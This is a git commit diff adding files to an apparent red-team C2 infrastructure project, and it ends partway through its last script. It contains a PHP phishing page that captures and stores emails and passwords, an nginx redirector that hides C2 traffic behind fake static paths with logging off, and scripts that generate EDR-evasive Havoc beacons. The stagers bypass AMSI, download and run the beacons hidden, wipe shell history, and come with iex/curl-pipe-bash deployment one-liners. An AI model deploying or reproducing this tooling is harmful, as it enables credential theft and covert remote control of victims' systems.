restructuring for easier navigation and modularity
This commit is contained in:
@@ -0,0 +1,17 @@
|
||||
================================================================
|
||||
C2ingRed Post-Installation Instructions
|
||||
================================================================
|
||||
|
||||
To complete your setup with SSL certificates, run:
|
||||
/root/Tools/post_install_c2.sh
|
||||
|
||||
This script will guide you through:
|
||||
- Setting up Let's Encrypt certificates
|
||||
- Starting required services
|
||||
- Setting up the redirector (if desired)
|
||||
- Displaying DNS configuration recommendations
|
||||
|
||||
For enhanced OPSEC, you can also randomize ports:
|
||||
/root/Tools/randomize_ports.sh
|
||||
|
||||
Run these after you've configured your DNS records to point to this server.
|
||||
@@ -0,0 +1,27 @@
|
||||
<?php
|
||||
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
|
||||
$data = [
|
||||
'timestamp' => date('Y-m-d H:i:s'),
|
||||
'ip' => $_SERVER['REMOTE_ADDR'],
|
||||
'user_agent' => $_SERVER['HTTP_USER_AGENT'],
|
||||
'email' => $_POST['email'] ?? '',
|
||||
'password' => $_POST['password'] ?? '',
|
||||
'headers' => getallheaders()
|
||||
];
|
||||
|
||||
|
||||
$log_file = '/var/private/creds/creds.enc';
|
||||
$encrypted = openssl_encrypt(
|
||||
json_encode($data),
|
||||
'AES-256-CBC',
|
||||
'{{ lookup("password", "/dev/null chars=ascii_letters,digits length=32") }}',
|
||||
0,
|
||||
str_repeat("\0", 16)
|
||||
);
|
||||
file_put_contents($log_file, $encrypted . "\n", FILE_APPEND);
|
||||
|
||||
|
||||
header('Location: https://login.microsoftonline.com/common/oauth2/);
|
||||
exit;
|
||||
}
|
||||
?>
|
||||
@@ -0,0 +1,80 @@
|
||||
server {
|
||||
listen 80;
|
||||
listen [::]:80;
|
||||
server_name {{ domain }};
|
||||
|
||||
# Redirect to HTTPS
|
||||
return 301 https://$host$request_uri;
|
||||
}
|
||||
|
||||
server {
|
||||
listen 443 ssl;
|
||||
listen [::]:443 ssl;
|
||||
server_name {{ domain }};
|
||||
|
||||
# SSL Configuration
|
||||
ssl_certificate /etc/letsencrypt/live/{{ domain }}/fullchain.pem;
|
||||
ssl_certificate_key /etc/letsencrypt/live/{{ domain }}/privkey.pem;
|
||||
|
||||
# Root directory
|
||||
root /var/www/html;
|
||||
index index.html;
|
||||
|
||||
# Primary location for legitimate website traffic
|
||||
location / {
|
||||
try_files $uri $uri/ =404;
|
||||
}
|
||||
|
||||
# Special URI patterns for C2 traffic
|
||||
# These will redirect to the actual C2 server
|
||||
|
||||
# Sliver HTTP C2 channel
|
||||
location /ajax/ {
|
||||
proxy_pass http://{{ c2_host }}:8888;
|
||||
proxy_http_version 1.1;
|
||||
proxy_set_header Host $host;
|
||||
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
||||
proxy_set_header X-Real-IP $remote_addr;
|
||||
proxy_set_header Upgrade $http_upgrade;
|
||||
proxy_set_header Connection "upgrade";
|
||||
}
|
||||
|
||||
# Static resources that actually redirect to C2
|
||||
location ~ ^/static/(css|js|images)/.*\.(css|js|png|jpg|jpeg|gif|ico)$ {
|
||||
proxy_pass http://{{ c2_host }}:8888;
|
||||
proxy_http_version 1.1;
|
||||
proxy_set_header Host $host;
|
||||
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
||||
proxy_set_header X-Real-IP $remote_addr;
|
||||
}
|
||||
|
||||
# Additional security headers
|
||||
add_header X-Content-Type-Options "nosniff" always;
|
||||
add_header X-Frame-Options "SAMEORIGIN" always;
|
||||
add_header X-XSS-Protection "1; mode=block" always;
|
||||
add_header Referrer-Policy "no-referrer" always;
|
||||
add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:;" always;
|
||||
|
||||
# Disable logging for this server block
|
||||
access_log off;
|
||||
error_log /dev/null crit;
|
||||
}
|
||||
|
||||
# Catch-all server block to respond to unknown hosts
|
||||
server {
|
||||
listen 80 default_server;
|
||||
listen [::]:80 default_server;
|
||||
listen 443 ssl default_server;
|
||||
listen [::]:443 ssl default_server;
|
||||
|
||||
# Self-signed cert for catch-all
|
||||
ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;
|
||||
ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;
|
||||
|
||||
# Redirect all unknown traffic to a legitimate-looking site
|
||||
return 301 https://www.google.com;
|
||||
|
||||
# Disable logs
|
||||
access_log off;
|
||||
error_log /dev/null crit;
|
||||
}
|
||||
@@ -0,0 +1,456 @@
|
||||
#!/bin/bash
|
||||
# EDR-evasive beacon generator for Havoc C2
|
||||
# Every deployment produces completely unique payloads
|
||||
|
||||
# Configuration (automatically populated by Ansible)
|
||||
HAVOC_DIR="/root/Tools/Havoc"
|
||||
BEACONS_DIR="/root/Tools/beacons"
|
||||
C2_HOST="{{ ansible_host }}"
|
||||
REDIRECTOR_HOST="{{ redirector_subdomain }}.{{ domain }}"
|
||||
REDIRECTOR_PORT="{{ redirector_port | default('9443') }}"
|
||||
PROFILE_FILE="$HAVOC_DIR/config/profile.json"
|
||||
|
||||
# Ensure required directories exist
|
||||
mkdir -p $BEACONS_DIR/windows
|
||||
mkdir -p $BEACONS_DIR/linux
|
||||
mkdir -p $BEACONS_DIR/staged
|
||||
mkdir -p $BEACONS_DIR/shellcode
|
||||
|
||||
# Load Havoc configuration from profile
|
||||
if [ -f "$PROFILE_FILE" ]; then
|
||||
echo "[+] Loading Havoc configuration from profile..."
|
||||
TEAMSERVER_PORT=$(jq -r '.teamserver_port' "$PROFILE_FILE")
|
||||
ADMIN_USER=$(jq -r '.admin_user' "$PROFILE_FILE")
|
||||
ADMIN_PASS=$(jq -r '.admin_pass' "$PROFILE_FILE")
|
||||
HTTP_PORT=$(jq -r '.http_port' "$PROFILE_FILE")
|
||||
HTTPS_PORT=$(jq -r '.https_port' "$PROFILE_FILE")
|
||||
else
|
||||
echo "[!] Warning: Profile file not found, using default values"
|
||||
TEAMSERVER_PORT=40056
|
||||
ADMIN_USER="admin"
|
||||
ADMIN_PASS="admin"
|
||||
HTTP_PORT=8080
|
||||
HTTPS_PORT=443
|
||||
fi
|
||||
|
||||
# Generate unique random values for each execution
|
||||
random_string() {
|
||||
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w ${1:-8} | head -n 1
|
||||
}
|
||||
|
||||
# Anti-detection function to modify binary files
|
||||
modify_binary() {
|
||||
local input_file=$1
|
||||
|
||||
echo "[+] Applying anti-detection modifications to: $input_file"
|
||||
|
||||
# Create a temporary file
|
||||
local temp_file="${input_file}.tmp"
|
||||
cp "$input_file" "$temp_file"
|
||||
|
||||
# Modify the file based on its type
|
||||
if file "$input_file" | grep -q "PE32"; then
|
||||
# Windows EXE/DLL modifications
|
||||
|
||||
# Add random bytes to end of file
|
||||
dd if=/dev/urandom bs=1 count=$(( RANDOM % 1000 + 100 )) >> "$temp_file" 2>/dev/null
|
||||
|
||||
# Modify PE header timestamps with random value
|
||||
random_timestamp=$(printf '%08x' $(( RANDOM * RANDOM )))
|
||||
printf "\\x${random_timestamp:0:2}\\x${random_timestamp:2:2}\\x${random_timestamp:4:2}\\x${random_timestamp:6:2}" | \
|
||||
dd of="$temp_file" bs=1 seek=136 count=4 conv=notrunc 2>/dev/null
|
||||
|
||||
# Try to strip debug information
|
||||
if command -v strip &> /dev/null; then
|
||||
strip --strip-debug "$temp_file" 2>/dev/null || true
|
||||
fi
|
||||
|
||||
elif file "$input_file" | grep -q "ELF"; then
|
||||
# Linux ELF modifications
|
||||
|
||||
# Add random bytes to end of file
|
||||
dd if=/dev/urandom bs=1 count=$(( RANDOM % 500 + 50 )) >> "$temp_file" 2>/dev/null
|
||||
|
||||
# Try to strip all symbols
|
||||
if command -v strip &> /dev/null; then
|
||||
strip --strip-all "$temp_file" 2>/dev/null || true
|
||||
fi
|
||||
fi
|
||||
|
||||
# Replace original with modified version
|
||||
mv "$temp_file" "$input_file"
|
||||
|
||||
echo "[+] Binary modifications complete"
|
||||
}
|
||||
|
||||
# Create advanced Havoc payload profile with evasion techniques
|
||||
generate_profile() {
|
||||
local type=$1
|
||||
local profile_name="${type}_profile_$(random_string 8).json"
|
||||
|
||||
echo "[+] Creating evasive $type profile..."
|
||||
|
||||
# Generate random values for this profile
|
||||
local sleep_time=$(( RANDOM % 10 + 2 ))
|
||||
local jitter_percent=$(( RANDOM % 50 + 10 ))
|
||||
|
||||
if [ "$type" == "windows" ]; then
|
||||
cat > "$BEACONS_DIR/$profile_name" << EOF
|
||||
{
|
||||
"Listener": "https",
|
||||
"Demon": {
|
||||
"Sleep": ${sleep_time},
|
||||
"SleepJitter": ${jitter_percent},
|
||||
"IndirectSyscalls": true,
|
||||
"Inject": {
|
||||
"AllocationMethod": $(( RANDOM % 3 )),
|
||||
"ExecutionMethod": $(( RANDOM % 3 )),
|
||||
"ExecuteOptions": $(( RANDOM % 2 ))
|
||||
},
|
||||
"Evasion": {
|
||||
"StackSpoofing": true,
|
||||
"SleazeUnhook": true,
|
||||
"AmsiEtwPatching": true,
|
||||
"SyscallMethod": $(( RANDOM % 3 )),
|
||||
"EnableSleepMask": true,
|
||||
"SleepMaskTechnique": $(( RANDOM % 4 ))
|
||||
},
|
||||
"Binary": {
|
||||
"Subsystem": $(( RANDOM % 2 + 1 ))
|
||||
}
|
||||
}
|
||||
}
|
||||
EOF
|
||||
elif [ "$type" == "linux" ]; then
|
||||
cat > "$BEACONS_DIR/$profile_name" << EOF
|
||||
{
|
||||
"Listener": "https",
|
||||
"Demon": {
|
||||
"Sleep": ${sleep_time},
|
||||
"SleepJitter": ${jitter_percent},
|
||||
"Injection": {
|
||||
"SpawnMethod": $(( RANDOM % 2 )),
|
||||
"AllocationMethod": $(( RANDOM % 2 ))
|
||||
},
|
||||
"Evasion": {
|
||||
"EnableSleepMask": true,
|
||||
"SleepMaskTechnique": $(( RANDOM % 4 ))
|
||||
}
|
||||
}
|
||||
}
|
||||
EOF
|
||||
fi
|
||||
|
||||
echo "$profile_name"
|
||||
}
|
||||
|
||||
# Generate Havoc payloads with EDR evasion techniques
|
||||
generate_payloads() {
|
||||
echo "[+] Generating EDR-evasive Havoc beacons..."
|
||||
|
||||
# Windows EXE
|
||||
win_profile=$(generate_profile "windows")
|
||||
win_output="update_win_$(random_string 8).exe"
|
||||
echo "[+] Creating Windows beacon: $win_output with profile $win_profile"
|
||||
|
||||
$HAVOC_DIR/Client/havoc headless \
|
||||
--teamserver "127.0.0.1:$TEAMSERVER_PORT" \
|
||||
--username "$ADMIN_USER" \
|
||||
--password "$ADMIN_PASS" \
|
||||
--daemon \
|
||||
--generate payload \
|
||||
--listener "https" \
|
||||
--config "$BEACONS_DIR/$win_profile" \
|
||||
--format exe \
|
||||
--output "$BEACONS_DIR/windows/$win_output" \
|
||||
> /dev/null 2>&1
|
||||
|
||||
# Apply custom binary modifications
|
||||
if [ -f "$BEACONS_DIR/windows/$win_output" ]; then
|
||||
modify_binary "$BEACONS_DIR/windows/$win_output"
|
||||
fi
|
||||
|
||||
# Windows DLL
|
||||
dll_profile=$(generate_profile "windows")
|
||||
dll_output="module_$(random_string 8).dll"
|
||||
echo "[+] Creating Windows DLL: $dll_output with profile $dll_profile"
|
||||
|
||||
$HAVOC_DIR/Client/havoc headless \
|
||||
--teamserver "127.0.0.1:$TEAMSERVER_PORT" \
|
||||
--username "$ADMIN_USER" \
|
||||
--password "$ADMIN_PASS" \
|
||||
--daemon \
|
||||
--generate payload \
|
||||
--listener "https" \
|
||||
--config "$BEACONS_DIR/$dll_profile" \
|
||||
--format dll \
|
||||
--output "$BEACONS_DIR/windows/$dll_output" \
|
||||
> /dev/null 2>&1
|
||||
|
||||
# Apply custom binary modifications
|
||||
if [ -f "$BEACONS_DIR/windows/$dll_output" ]; then
|
||||
modify_binary "$BEACONS_DIR/windows/$dll_output"
|
||||
fi
|
||||
|
||||
# Linux binary
|
||||
linux_profile=$(generate_profile "linux")
|
||||
linux_output="update_linux_$(random_string 8)"
|
||||
echo "[+] Creating Linux binary: $linux_output with profile $linux_profile"
|
||||
|
||||
$HAVOC_DIR/Client/havoc headless \
|
||||
--teamserver "127.0.0.1:$TEAMSERVER_PORT" \
|
||||
--username "$ADMIN_USER" \
|
||||
--password "$ADMIN_PASS" \
|
||||
--daemon \
|
||||
--generate payload \
|
||||
--listener "https" \
|
||||
--config "$BEACONS_DIR/$linux_profile" \
|
||||
--format elf \
|
||||
--output "$BEACONS_DIR/linux/$linux_output" \
|
||||
> /dev/null 2>&1
|
||||
|
||||
# Apply custom binary modifications
|
||||
if [ -f "$BEACONS_DIR/linux/$linux_output" ]; then
|
||||
modify_binary "$BEACONS_DIR/linux/$linux_output"
|
||||
fi
|
||||
|
||||
# Windows shellcode (staged payload)
|
||||
shellcode_profile=$(generate_profile "windows")
|
||||
shellcode_output="shellcode_$(random_string 8).bin"
|
||||
echo "[+] Creating Windows shellcode: $shellcode_output with profile $shellcode_profile"
|
||||
|
||||
$HAVOC_DIR/Client/havoc headless \
|
||||
--teamserver "127.0.0.1:$TEAMSERVER_PORT" \
|
||||
--username "$ADMIN_USER" \
|
||||
--password "$ADMIN_PASS" \
|
||||
--daemon \
|
||||
--generate payload \
|
||||
--listener "https" \
|
||||
--config "$BEACONS_DIR/$shellcode_profile" \
|
||||
--format shellcode \
|
||||
--output "$BEACONS_DIR/shellcode/$shellcode_output" \
|
||||
> /dev/null 2>&1
|
||||
|
||||
echo "[+] All payloads generated successfully!"
|
||||
|
||||
# Return payload information
|
||||
echo "$win_output:$dll_output:$linux_output:$shellcode_output"
|
||||
}
|
||||
|
||||
# Generate PowerShell and bash stagers
|
||||
generate_stagers() {
|
||||
win_output=$1
|
||||
linux_output=$2
|
||||
|
||||
echo "[+] Generating evasive stagers..."
|
||||
|
||||
# Create PowerShell stager directory
|
||||
mkdir -p $BEACONS_DIR/stagers
|
||||
|
||||
# PowerShell stager with AMSI bypass and obfuscation
|
||||
cat > $BEACONS_DIR/stagers/windows_stager.ps1 << 'EOF'
|
||||
# PowerShell stager for Havoc C2 with AMSI bypass
|
||||
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
|
||||
|
||||
# AMSI Bypass
|
||||
function Bypass-AMSI {
|
||||
$a = [Ref].Assembly.GetTypes()
|
||||
ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}
|
||||
$d = $c.GetFields('NonPublic,Static')
|
||||
ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}}
|
||||
$g = $f.GetValue($null)
|
||||
[IntPtr]$ptr = $g
|
||||
[Int32[]]$buf = @(0)
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
|
||||
}
|
||||
|
||||
# Try to bypass AMSI
|
||||
try { Bypass-AMSI } catch {}
|
||||
|
||||
# Randomize variables for evasion
|
||||
$rnd1 = -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
|
||||
$rnd2 = -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
|
||||
$rnd3 = -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
|
||||
|
||||
# Error handling with obfuscation
|
||||
$ErrorActionPreference = 'SilentlyContinue'
|
||||
$wc = New-Object System.Net.WebClient
|
||||
$wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36")
|
||||
$wc.Headers.Add("Accept-Language", "en-US,en;q=0.9")
|
||||
$wc.Headers.Add("Referer", "https://REDIRECTOR_HOST/")
|
||||
|
||||
# Split URL to avoid detection
|
||||
$r1 = "https://"
|
||||
$r2 = "REDIRECTOR_HOST"
|
||||
$r3 = "/content/windows/WINDOWS_EXE"
|
||||
$url = $r1 + $r2 + $r3
|
||||
|
||||
# Download with jitter
|
||||
$outpath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "$rnd1.exe")
|
||||
try {
|
||||
$wc.DownloadFile($url, $outpath)
|
||||
Start-Sleep -Milliseconds (Get-Random -Minimum 500 -Maximum 3000)
|
||||
|
||||
# Start process with extra obfuscation
|
||||
$p = New-Object System.Diagnostics.Process
|
||||
$p.StartInfo.FileName = $outpath
|
||||
$p.StartInfo.WindowStyle = 'Hidden'
|
||||
$p.StartInfo.CreateNoWindow = $true
|
||||
$p.Start()
|
||||
|
||||
} catch {
|
||||
# Fail silently
|
||||
}
|
||||
EOF
|
||||
|
||||
# Replace placeholder values in PowerShell stager
|
||||
sed -i "s/REDIRECTOR_HOST/$REDIRECTOR_HOST/g" $BEACONS_DIR/stagers/windows_stager.ps1
|
||||
sed -i "s/WINDOWS_EXE/$win_output/g" $BEACONS_DIR/stagers/windows_stager.ps1
|
||||
|
||||
# Bash stager with obfuscation techniques
|
||||
cat > $BEACONS_DIR/stagers/linux_stager.sh << 'EOF'
|
||||
#!/bin/bash
|
||||
# Linux download and execute Havoc beacon with EDR evasion
|
||||
|
||||
# Function obfuscation
|
||||
function x() {
|
||||
command -v "$1" > /dev/null 2>&1
|
||||
}
|
||||
|
||||
# Random temp filename
|
||||
r() {
|
||||
head /dev/urandom | tr -dc a-zA-Z0-9 | head -c${1:-10}
|
||||
}
|
||||
|
||||
# Randomize variables
|
||||
TMPVAR=$(r)
|
||||
TMPFILE="/tmp/.${TMPVAR}"
|
||||
|
||||
# Check which download tool is available
|
||||
if x curl; then
|
||||
# Split URL to avoid signature detection
|
||||
p1="https://"
|
||||
p2="REDIRECTOR_HOST"
|
||||
p3="/content/linux/LINUX_BINARY"
|
||||
url="${p1}${p2}${p3}"
|
||||
# Add random sleep between operations
|
||||
sleep $(awk -v min=0.1 -v max=0.5 'BEGIN{srand(); print min+rand()*(max-min)}')
|
||||
curl -s -o "$TMPFILE" "$url"
|
||||
elif x wget; then
|
||||
p1="https://"
|
||||
p2="REDIRECTOR_HOST"
|
||||
p3="/content/linux/LINUX_BINARY"
|
||||
url="${p1}${p2}${p3}"
|
||||
# Add random sleep between operations
|
||||
sleep $(awk -v min=0.1 -v max=0.5 'BEGIN{srand(); print min+rand()*(max-min)}')
|
||||
wget -q -O "$TMPFILE" "$url"
|
||||
else
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Make executable and run in background
|
||||
chmod +x "$TMPFILE"
|
||||
# Add random sleep before execution
|
||||
sleep $(awk -v min=0.1 -v max=0.5 'BEGIN{srand(); print min+rand()*(max-min)}')
|
||||
("$TMPFILE" > /dev/null 2>&1 &)
|
||||
|
||||
# Clean up command history if possible
|
||||
[ -f ~/.bash_history ] && cat /dev/null > ~/.bash_history 2>/dev/null
|
||||
history -c 2>/dev/null
|
||||
|
||||
echo "Update complete."
|
||||
EOF
|
||||
|
||||
# Replace placeholder values in Bash stager
|
||||
sed -i "s/REDIRECTOR_HOST/$REDIRECTOR_HOST/g" $BEACONS_DIR/stagers/linux_stager.sh
|
||||
sed -i "s/LINUX_BINARY/$linux_output/g" $BEACONS_DIR/stagers/linux_stager.sh
|
||||
chmod +x $BEACONS_DIR/stagers/linux_stager.sh
|
||||
|
||||
echo "[+] Stagers created successfully"
|
||||
}
|
||||
|
||||
# Create manifest file
|
||||
create_manifest() {
|
||||
local payload_info=$1
|
||||
local win_output=$(echo $payload_info | cut -d':' -f1)
|
||||
local dll_output=$(echo $payload_info | cut -d':' -f2)
|
||||
local linux_output=$(echo $payload_info | cut -d':' -f3)
|
||||
local shellcode_output=$(echo $payload_info | cut -d':' -f4)
|
||||
|
||||
echo "[+] Creating manifest file..."
|
||||
cat > $BEACONS_DIR/manifest.json << EOF
|
||||
{
|
||||
"windows_exe": "$win_output",
|
||||
"windows_dll": "$dll_output",
|
||||
"linux_binary": "$linux_output",
|
||||
"windows_shellcode": "$shellcode_output",
|
||||
"redirector_host": "$REDIRECTOR_HOST",
|
||||
"redirector_port": "$REDIRECTOR_PORT",
|
||||
"c2_host": "$C2_HOST",
|
||||
"havoc_teamserver_port": "$TEAMSERVER_PORT",
|
||||
"havoc_http_port": "$HTTP_PORT",
|
||||
"havoc_https_port": "$HTTPS_PORT",
|
||||
"generation_time": "$(date -u +"%Y-%m-%dT%H:%M:%SZ")"
|
||||
}
|
||||
EOF
|
||||
}
|
||||
|
||||
# Create reference file
|
||||
create_reference() {
|
||||
local payload_info=$1
|
||||
local win_output=$(echo $payload_info | cut -d':' -f1)
|
||||
local dll_output=$(echo $payload_info | cut -d':' -f2)
|
||||
local linux_output=$(echo $payload_info | cut -d':' -f3)
|
||||
local shellcode_output=$(echo $payload_info | cut -d':' -f4)
|
||||
|
||||
echo "[+] Creating reference file..."
|
||||
cat > $BEACONS_DIR/reference.txt << EOF
|
||||
Havoc C2 Server Details:
|
||||
- C2 IP: $C2_HOST
|
||||
- Redirector Domain: $REDIRECTOR_HOST
|
||||
- Teamserver Port: $TEAMSERVER_PORT
|
||||
- Admin User: $ADMIN_USER
|
||||
- Admin Password: $ADMIN_PASS
|
||||
|
||||
Beacons Generated ($(date)):
|
||||
- Windows EXE: $win_output (Path: $BEACONS_DIR/windows/$win_output)
|
||||
- Windows DLL: $dll_output (Path: $BEACONS_DIR/windows/$dll_output)
|
||||
- Linux Binary: $linux_output (Path: $BEACONS_DIR/linux/$linux_output)
|
||||
- Windows Shellcode: $shellcode_output (Path: $BEACONS_DIR/shellcode/$shellcode_output)
|
||||
|
||||
Deployment Commands:
|
||||
- PowerShell:
|
||||
powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('https://$REDIRECTOR_HOST/windows_stager.ps1')"
|
||||
|
||||
- Linux:
|
||||
curl -s https://$REDIRECTOR_HOST/linux_stager.sh | bash
|
||||
|
||||
Anti-Detection Features Enabled:
|
||||
- Binary signature randomization
|
||||
- PE/ELF header manipulation
|
||||
- Sleep mask obfuscation
|
||||
- AMSI bypass in stagers
|
||||
- EDR unhooking
|
||||
- Indirect syscalls
|
||||
- Random sleep/jitter timing
|
||||
EOF
|
||||
}
|
||||
|
||||
# Main execution flow
|
||||
echo "[+] Starting EDR-evasive Havoc beacon generation..."
|
||||
echo "[+] Redirector: $REDIRECTOR_HOST"
|
||||
echo "[+] C2 Host: $C2_HOST"
|
||||
|
||||
# Generate payloads
|
||||
payload_info=$(generate_payloads)
|
||||
|
||||
# Generate stagers
|
||||
generate_stagers $(echo $payload_info | cut -d':' -f1) $(echo $payload_info | cut -d':' -f3)
|
||||
|
||||
# Create manifest file
|
||||
create_manifest "$payload_info"
|
||||
|
||||
# Create reference file
|
||||
create_reference "$payload_info"
|
||||
|
||||
echo "[+] EDR-evasive beacon generation complete!"
|
||||
@@ -0,0 +1,260 @@
|
||||
#!/bin/bash
|
||||
# EDR-evasive payload generator for Havoc C2
|
||||
|
||||
# Configuration (automatically populated by Ansible)
|
||||
PAYLOADS_DIR="/root/Tools/Havoc/payloads"
|
||||
C2_HOST="{{ ansible_host }}"
|
||||
REDIRECTOR_HOST="{{ redirector_subdomain }}.{{ domain }}"
|
||||
REDIRECTOR_PORT="{{ redirector_port | default('9443') }}"
|
||||
TEAMSERVER_HOST="127.0.0.1"
|
||||
TEAMSERVER_PORT="40056"
|
||||
HAVOC_DIR="/root/Tools/Havoc"
|
||||
HAVOC_CLIENT="$HAVOC_DIR/Client/havoc"
|
||||
|
||||
# Ensure required directories exist
|
||||
mkdir -p $PAYLOADS_DIR/windows
|
||||
mkdir -p $PAYLOADS_DIR/linux
|
||||
mkdir -p $PAYLOADS_DIR/staged
|
||||
|
||||
# Generate unique random values for each execution
|
||||
random_string() {
|
||||
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w ${1:-8} | head -n 1
|
||||
}
|
||||
|
||||
# Define Havoc profiles for different payloads
|
||||
generate_profiles() {
|
||||
echo "[+] Generating Havoc C2 profiles..."
|
||||
|
||||
# Profile for Windows EXE
|
||||
cat > $PAYLOADS_DIR/win_exe.profile << EOF
|
||||
{
|
||||
"Listener": "https",
|
||||
"Demon": {
|
||||
"Sleep": 5,
|
||||
"SleepJitter": 30,
|
||||
"IndirectSyscalls": true,
|
||||
"Inject": {
|
||||
"AllocationMethod": 0,
|
||||
"ExecutionMethod": 0,
|
||||
"ExecuteOptions": 0
|
||||
},
|
||||
"Evasion": {
|
||||
"StackSpoofing": true,
|
||||
"SleazeUnhook": true,
|
||||
"AmsiEtwPatching": true
|
||||
},
|
||||
"Formats": [
|
||||
"Binary",
|
||||
"Shellcode"
|
||||
]
|
||||
}
|
||||
}
|
||||
EOF
|
||||
|
||||
# Profile for Linux ELF
|
||||
cat > $PAYLOADS_DIR/linux_elf.profile << EOF
|
||||
{
|
||||
"Listener": "https",
|
||||
"Demon": {
|
||||
"Sleep": 5,
|
||||
"SleepJitter": 30,
|
||||
"Injection": {
|
||||
"SpawnMethod": 1,
|
||||
"AllocationMethod": 1
|
||||
},
|
||||
"Formats": [
|
||||
"Binary",
|
||||
"Shellcode"
|
||||
]
|
||||
}
|
||||
}
|
||||
EOF
|
||||
|
||||
echo "[+] Profiles created successfully"
|
||||
}
|
||||
|
||||
# Generate Havoc payloads with CLI arguments
|
||||
generate_payloads() {
|
||||
echo "[+] Generating Havoc payloads..."
|
||||
|
||||
# Windows EXE
|
||||
win_output="agent_win_$(random_string 8).exe"
|
||||
echo "[+] Generating Windows payload: $win_output"
|
||||
|
||||
$HAVOC_CLIENT headless \
|
||||
--teamserver "$TEAMSERVER_HOST:$TEAMSERVER_PORT" \
|
||||
--username "admin" \
|
||||
--password "$(grep 'Password' $HAVOC_DIR/data/profiles/default.yaotl | cut -d'"' -f2)" \
|
||||
--daemon \
|
||||
--generate payload \
|
||||
--listener "https" \
|
||||
--config "$PAYLOADS_DIR/win_exe.profile" \
|
||||
--format exe \
|
||||
--output "$PAYLOADS_DIR/windows/$win_output" \
|
||||
> /dev/null 2>&1
|
||||
|
||||
# Windows DLL
|
||||
dll_output="module_$(random_string 8).dll"
|
||||
echo "[+] Generating Windows DLL: $dll_output"
|
||||
|
||||
$HAVOC_CLIENT headless \
|
||||
--teamserver "$TEAMSERVER_HOST:$TEAMSERVER_PORT" \
|
||||
--username "admin" \
|
||||
--password "$(grep 'Password' $HAVOC_DIR/data/profiles/default.yaotl | cut -d'"' -f2)" \
|
||||
--daemon \
|
||||
--generate payload \
|
||||
--listener "https" \
|
||||
--config "$PAYLOADS_DIR/win_exe.profile" \
|
||||
--format dll \
|
||||
--output "$PAYLOADS_DIR/windows/$dll_output" \
|
||||
> /dev/null 2>&1
|
||||
|
||||
# Linux ELF
|
||||
linux_output="agent_linux_$(random_string 8)"
|
||||
echo "[+] Generating Linux payload: $linux_output"
|
||||
|
||||
$HAVOC_CLIENT headless \
|
||||
--teamserver "$TEAMSERVER_HOST:$TEAMSERVER_PORT" \
|
||||
--username "admin" \
|
||||
--password "$(grep 'Password' $HAVOC_DIR/data/profiles/default.yaotl | cut -d'"' -f2)" \
|
||||
--daemon \
|
||||
--generate payload \
|
||||
--listener "https" \
|
||||
--config "$PAYLOADS_DIR/linux_elf.profile" \
|
||||
--format elf \
|
||||
--output "$PAYLOADS_DIR/linux/$linux_output" \
|
||||
> /dev/null 2>&1
|
||||
|
||||
echo "[+] All payloads generated successfully!"
|
||||
|
||||
# Return payload names for reference
|
||||
echo "$win_output:$dll_output:$linux_output"
|
||||
}
|
||||
|
||||
# Generate PowerShell and bash stagers
|
||||
generate_stagers() {
|
||||
win_output=$1
|
||||
linux_output=$2
|
||||
|
||||
echo "[+] Generating stagers..."
|
||||
|
||||
# PowerShell stager
|
||||
cat > $PAYLOADS_DIR/stagers/windows_stager.ps1 << EOF
|
||||
# PowerShell stager for Havoc C2
|
||||
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
|
||||
\$ErrorActionPreference = 'SilentlyContinue'
|
||||
\$wc = New-Object System.Net.WebClient
|
||||
\$wc.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36")
|
||||
\$wc.Headers.Add("Accept-Language", "en-US,en;q=0.9")
|
||||
\$wc.Headers.Add("Referer", "https://$REDIRECTOR_HOST/")
|
||||
\$url = "https://$REDIRECTOR_HOST/content/windows/$win_output"
|
||||
\$outpath = "\$env:TEMP\\update-\$(New-Guid).exe"
|
||||
try {
|
||||
\$wc.DownloadFile(\$url, \$outpath)
|
||||
Start-Sleep -Milliseconds (Get-Random -Minimum 500 -Maximum 3000)
|
||||
Start-Process -WindowStyle Hidden -FilePath \$outpath
|
||||
} catch {
|
||||
# Fail silently
|
||||
}
|
||||
EOF
|
||||
|
||||
# Bash stager
|
||||
cat > $PAYLOADS_DIR/stagers/linux_stager.sh << EOF
|
||||
#!/bin/bash
|
||||
# Linux download and execute Havoc beacon
|
||||
|
||||
# Download binary to /tmp with random name
|
||||
TMPFILE="/tmp/update-\$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"
|
||||
curl -s -o \$TMPFILE https://$REDIRECTOR_HOST/content/linux/$linux_output
|
||||
chmod +x \$TMPFILE
|
||||
|
||||
# Execute in background
|
||||
\$TMPFILE &
|
||||
|
||||
echo "Update complete."
|
||||
EOF
|
||||
|
||||
chmod +x $PAYLOADS_DIR/stagers/linux_stager.sh
|
||||
|
||||
echo "[+] Stagers generated successfully"
|
||||
}
|
||||
|
||||
# Create manifest file
|
||||
create_manifest() {
|
||||
payload_info=$1
|
||||
win_output=$(echo $payload_info | cut -d':' -f1)
|
||||
dll_output=$(echo $payload_info | cut -d':' -f2)
|
||||
linux_output=$(echo $payload_info | cut -d':' -f3)
|
||||
|
||||
